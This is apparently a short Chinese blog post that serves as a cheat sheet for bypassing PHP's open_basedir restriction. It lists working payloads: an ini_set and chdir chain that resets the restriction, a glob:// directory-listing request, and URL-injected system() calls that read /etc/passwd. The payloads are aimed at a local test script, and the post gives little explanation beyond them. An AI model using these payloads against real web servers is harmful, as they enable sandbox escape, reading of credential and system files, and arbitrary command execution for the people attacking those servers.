open_basedir代码绕过总结
测试环境
chdir()、ini_set()函数组合
payload
ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');system(‘cat ../../../../../etc/passwd’);
glob://绕过open_basedir
glob用来筛选目录的伪协议,筛选时不受open_basedir制约.
http://127.0.0.1/lfi/basedir.php?a=var_dump(scandir(%22./%22));
能够访问允许访问的当前目录
http://127.0.0.1/lfi/basedir.php?a=var_dump(scandir(%22../../%22));
无法访问../../超出open_basedir限制范围,访问失败
http://127.0.0.1/lfi/basedir.php?a=if%20(%20$b%20=%20opendir(%22glob:///var/www/html/*.php%22)%20)%20{while%20(%20($file%20=%20readdir($b))%20!==%20false%20)%20{echo%20%22filename:%22.$file.%22\n%22;}closedir($b);}
命令执行绕过
http://127.0.0.1/lfi/basedir.php?a=system('cat ../../../../../etc/passwd');
参考链接
https://tricking.io/card/28/description
https://bbs.ichunqiu.com/thread-41397-1-1.html
本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!